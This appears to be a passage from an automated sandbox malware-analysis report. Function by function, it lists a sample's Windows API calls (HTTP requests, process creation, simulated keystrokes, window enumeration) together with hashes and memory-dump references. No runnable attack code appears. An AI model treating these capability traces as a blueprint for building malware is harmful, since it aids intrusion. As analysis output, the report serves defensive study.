                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: fdf38c7feb6e47c599c0f4b433ab7a60fb0cd4d8c711e906c70c1857998bee6e
                                                                      • Instruction ID: 9031643cf8dce3f6551cae2b1a22f9d74bc7ffe87a3523173ce0e19d43714e27
                                                                      • Opcode Fuzzy Hash: fdf38c7feb6e47c599c0f4b433ab7a60fb0cd4d8c711e906c70c1857998bee6e
                                                                      • Instruction Fuzzy Hash: FEA19230305213CFDB19EF14D5A9BA9FB64BF55705F1046AEE80AAB251DB30AC96CF90
                                                                      Function 00589113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$_memset
                                                                      • String ID: ,,Z$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2862541840-2069657162
                                                                      • Opcode ID: 2dae4cc132a976f666b6229aab3d9e6e4437323da1bfab5eabcc8ea4dc58a3e1
                                                                      • Instruction ID: 19a52225e7bdfe594d1ff32d0c839e017b5faa045a2ea2f37878a0e71f143131
                                                                      • Opcode Fuzzy Hash: 2dae4cc132a976f666b6229aab3d9e6e4437323da1bfab5eabcc8ea4dc58a3e1
                                                                      • Instruction Fuzzy Hash: 1F917171A00215ABDF24EFA5C848FAEBFB8FF85710F148559F915BB280DB709945CBA0
                                                                      Function 0056A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumChildWindows.USER32(?,0056A439), ref: 0056A377
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ChildEnumWindows
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 3555792229-1603158881
                                                                      • Opcode ID: 96a4ce7526964a88c514eebad7cf8337cf2af13e17f1a1b3eb66060a4976944b
                                                                      • Instruction ID: 212689538bd9547970ad1c3216ca721d5e5752a8bb2a82757f9d1fbe66af699f
                                                                      • Opcode Fuzzy Hash: 96a4ce7526964a88c514eebad7cf8337cf2af13e17f1a1b3eb66060a4976944b
                                                                      • Instruction Fuzzy Hash: 9D91A331A0060AAEDB08DFA0C456BEDFFB4BF44300F549519E85AB7281DF316999CF91
                                                                      Function 00512E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00512EAE
                                                                        • Part of subcall function 00511DB3: GetClientRect.USER32(?,?), ref: 00511DDC
                                                                        • Part of subcall function 00511DB3: GetWindowRect.USER32(?,?), ref: 00511E1D
                                                                        • Part of subcall function 00511DB3: ScreenToClient.USER32(?,?), ref: 00511E45
                                                                      • GetDC.USER32 ref: 0054CD32
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0054CD45
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0054CD53
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0054CD68
                                                                      • ReleaseDC.USER32(?,00000000), ref: 0054CD70
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0054CDFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: 934a2c5a0f5b8a428bdd00fa79ab3a65d12d1c356f73820364da2d9637a66a65
                                                                      • Instruction ID: b774298d6bb851f495a5d72939631c6e158b4772d0da84c8cbfcac13f95d00f0
                                                                      • Opcode Fuzzy Hash: 934a2c5a0f5b8a428bdd00fa79ab3a65d12d1c356f73820364da2d9637a66a65
                                                                      • Instruction Fuzzy Hash: C7710431901205DFCF618F64C884AFA3FB5FF88328F14467AED559A2A6D7318C90EB60
                                                                      Function 00581A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00581A50
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00581A7C
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00581ABE
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00581AD3
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00581AE0
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00581B10
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00581B57
                                                                        • Part of subcall function 00582483: GetLastError.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 00582498
                                                                        • Part of subcall function 00582483: SetEvent.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 005824AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 2603140658-3916222277
                                                                      • Opcode ID: 9656ec64443efdb994821454ce67da5766245d8f56ed9965bb357aa24b452f9a
                                                                      • Instruction ID: 54d2734259016b73f7ddaeb3b7119b1783d65f6629577ffb61b7587ca49de51c
                                                                      • Opcode Fuzzy Hash: 9656ec64443efdb994821454ce67da5766245d8f56ed9965bb357aa24b452f9a
                                                                      • Instruction Fuzzy Hash: 80418BB1501609BFEB11AF50CC89FFA7BACFF08351F00412AFE05AA141E7709E459BA4
                                                                      Function 00588C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0059F910), ref: 00588D28
                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0059F910), ref: 00588D5C
                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00588ED6
                                                                      • SysFreeString.OLEAUT32(?), ref: 00588F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                      • String ID:
                                                                      • API String ID: 560350794-0
                                                                      • Opcode ID: c96eb16d2fd9e5745a668867cdcb854d48c63d02788752bd29adfeee7d9a80be
                                                                      • Instruction ID: 46f9fbe960e650648f1d3d0b960b474b73f8cd8f577a6720ebc5b2952598cc71
                                                                      • Opcode Fuzzy Hash: c96eb16d2fd9e5745a668867cdcb854d48c63d02788752bd29adfeee7d9a80be
                                                                      • Instruction Fuzzy Hash: 6CF1F771A00109EFDB14EF94C888EBEBBB9FF85314F548498F915AB251DB31AE45CB90
                                                                      Function 0058F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0058F6B5
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058F848
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058F86C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058F8AC
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058F8CE
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0058FA4A
                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0058FA7C
                                                                      • CloseHandle.KERNEL32(?), ref: 0058FAAB
                                                                      • CloseHandle.KERNEL32(?), ref: 0058FB22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                      • String ID:
                                                                      • API String ID: 4090791747-0
                                                                      • Opcode ID: 663c68fbee1c25603215b40e59b80b4fcaa8d7826a2d8bf29597cf627577dbc3
                                                                      • Instruction ID: 06d0630238cb95f7565eb0126a8f2089c46d1956a008f55db50c043eb6ec25dd
                                                                      • Opcode Fuzzy Hash: 663c68fbee1c25603215b40e59b80b4fcaa8d7826a2d8bf29597cf627577dbc3
                                                                      • Instruction Fuzzy Hash: 8BE1AE31604301AFD714EF24D895A6ABFE5FF89310F14896DF889AB2A2CB31DC45CB52
                                                                      Function 00574CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573697,?), ref: 0057468B
                                                                        • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573697,?), ref: 005746A4
                                                                        • Part of subcall function 00574A31: GetFileAttributesW.KERNEL32(?,0057370B), ref: 00574A32
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00574D40
                                                                      • _wcscmp.LIBCMT ref: 00574D5A
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00574D75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 793581249-0
                                                                      • Opcode ID: 6ef79716b6ba73efa6b1cf8d8070c2a8acc190898c14afebe2b5838836cd5a94
                                                                      • Instruction ID: e65fb933c564514092609e0b6acd355a529f78205475d5919e5aab0be9009e29
                                                                      • Opcode Fuzzy Hash: 6ef79716b6ba73efa6b1cf8d8070c2a8acc190898c14afebe2b5838836cd5a94
                                                                      • Instruction Fuzzy Hash: 38513FB20083459BC725DB64E8859DFBBECBF84350F40492EF689D3151EF34A688DB66
                                                                      Function 00598645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005986FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: 98138eb437329702c661e149cb28dee82d19f897975f8123a70b7ab0f071d357
                                                                      • Instruction ID: fb327549f9b2e466ea03ab363f1efb71b4873b00d26e7688fd5785eb8f29547b
                                                                      • Opcode Fuzzy Hash: 98138eb437329702c661e149cb28dee82d19f897975f8123a70b7ab0f071d357
                                                                      • Instruction Fuzzy Hash: AE51C034600245BEEF209F68CC89FBD3FA4FB16360F600516F911EA2A1CF72A994DB50
                                                                      Function 00512B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0054C2F7
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0054C319
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0054C331
                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0054C34F
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0054C370
                                                                      • DestroyIcon.USER32(00000000), ref: 0054C37F
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0054C39C
                                                                      • DestroyIcon.USER32(?), ref: 0054C3AB
                                                                        • Part of subcall function 0059A4AF: DeleteObject.GDI32(00000000), ref: 0059A4E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                      • String ID:
                                                                      • API String ID: 2819616528-0
                                                                      • Opcode ID: 2b82affda66480a43412ca5d5f331a7c4c1b11cbbce9a774b19275acfabccc35
                                                                      • Instruction ID: b27258931df78157c9610ee2e1735546b94c31356eb02fa2a372bf5749111643
                                                                      • Opcode Fuzzy Hash: 2b82affda66480a43412ca5d5f331a7c4c1b11cbbce9a774b19275acfabccc35
                                                                      • Instruction Fuzzy Hash: 99517A74601209AFEB24DF64CC45FAA3FB5FB98314F104929F906D7290D7B0ACA0EB50
                                                                      Function 0056966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0056A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A84C
                                                                        • Part of subcall function 0056A82C: GetCurrentThreadId.KERNEL32 ref: 0056A853
                                                                        • Part of subcall function 0056A82C: AttachThreadInput.USER32(00000000,?,00569683,?,00000001), ref: 0056A85A
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0056968E
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005696AB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005696AE
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 005696B7
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005696D5
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005696D8
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 005696E1
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005696F8
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005696FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 6c6bf1a1aec3f4739ea26853221bb57ba117804cfdfd73b26ea2a1e563e31144
                                                                      • Instruction ID: 019ecc067b8961acdaed68157ee9da3657d53a2f73dacda33ef53e67f4e4446b
                                                                      • Opcode Fuzzy Hash: 6c6bf1a1aec3f4739ea26853221bb57ba117804cfdfd73b26ea2a1e563e31144
                                                                      • Instruction Fuzzy Hash: 26118EB1950618BFF6106B60DC89F6A7E2DEB5C751F120426F244AB0A1C9F26C50EBE4
                                                                      Function 00568921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0056853C,00000B00,?,?), ref: 0056892A
                                                                      • HeapAlloc.KERNEL32(00000000,?,0056853C,00000B00,?,?), ref: 00568931
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0056853C,00000B00,?,?), ref: 00568946
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0056853C,00000B00,?,?), ref: 0056894E
                                                                      • DuplicateHandle.KERNEL32(00000000,?,0056853C,00000B00,?,?), ref: 00568951
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0056853C,00000B00,?,?), ref: 00568961
                                                                      • GetCurrentProcess.KERNEL32(0056853C,00000000,?,0056853C,00000B00,?,?), ref: 00568969
                                                                      • DuplicateHandle.KERNEL32(00000000,?,0056853C,00000B00,?,?), ref: 0056896C
                                                                      • CreateThread.KERNEL32(00000000,00000000,00568992,00000000,00000000,00000000), ref: 00568986
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 3cd300d6b68373aa3d1bb26de043f0799248dca0c9c5fb51051c2ae3ca1986c8
                                                                      • Instruction ID: 385f27fab5e3c97f4e665bdaa032aa33d44457d9da5ec5474f63d4212b808dfb
                                                                      • Opcode Fuzzy Hash: 3cd300d6b68373aa3d1bb26de043f0799248dca0c9c5fb51051c2ae3ca1986c8
                                                                      • Instruction Fuzzy Hash: 8701BF75240304FFEB10ABA5DC4DF6B3B6CEB99711F554422FA05DB1A1CA709804EB64
                                                                      Function 00589B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: a4baaff14c419e2da607140b5a9ec3bca6e224cbd0500668d5e4d99123d3af6c
                                                                      • Instruction ID: b9d0d6fdd075545b30fe2ddb5446260d5c625ca1aefae6269b75376f348934b6
                                                                      • Opcode Fuzzy Hash: a4baaff14c419e2da607140b5a9ec3bca6e224cbd0500668d5e4d99123d3af6c
                                                                      • Instruction Fuzzy Hash: 8AC16371A0021A9FDF10EF98D885ABEBFF9BB48314F188469ED05B7281E7719D45CB90
                                                                      Function 0058975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0056710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?,?,00567455), ref: 00567127
                                                                        • Part of subcall function 0056710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567142
                                                                        • Part of subcall function 0056710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?,?), ref: 00567150
                                                                        • Part of subcall function 0056710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567044,80070057,?), ref: 00567160
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00589806
                                                                      • _memset.LIBCMT ref: 00589813
                                                                      • _memset.LIBCMT ref: 00589956
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00589982
                                                                      • CoTaskMemFree.OLE32(?), ref: 0058998D
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 005899DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1300414916-2785691316
